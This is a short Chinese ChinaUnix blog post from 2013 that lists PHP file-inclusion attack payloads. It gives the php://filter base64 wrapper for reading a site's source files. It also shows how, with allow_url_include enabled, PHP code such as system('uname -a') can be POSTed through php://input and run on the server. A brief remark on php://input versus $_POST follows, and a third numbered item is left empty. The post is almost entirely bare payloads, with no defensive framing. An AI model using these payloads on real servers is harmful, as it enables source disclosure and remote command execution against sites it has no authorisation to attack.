Chinaunix首页 | 论坛 | 博客
  • 博客访问: 213345
  • 博文数量: 40
  • 博客积分: 316
  • 博客等级: 二等列兵
  • 技术积分: 840
  • 用 户 组: 普通用户
  • 注册时间: 2012-03-13 12:39
文章分类

全部博文(40)

文章存档

2014年(2)

2013年(28)

2012年(10)

分类: PHP

2013-06-08 11:52:27

1.
                              php://filter/convert.base64-encode/resource=index
2.
在allow_url_include = on 且 PHP >= 5.2.0

  直接POST php代码并执行 
 
  post提交的数据:

点击(此处)折叠或打开

  1. <?php system('uname -a');?>
/* php://input  与 $_POST的区别: 1>   前者 数据未经url编码  2>  前者  只有在enctype=application/x-www-data-urlencoded成功。 后者 在
   multipart/form-data成功。
3.
 
 


阅读(1547) | 评论(0) | 转发(0) |
0

上一篇:mysq索引修复

下一篇:emerge使用

给主人留下些什么吧!~~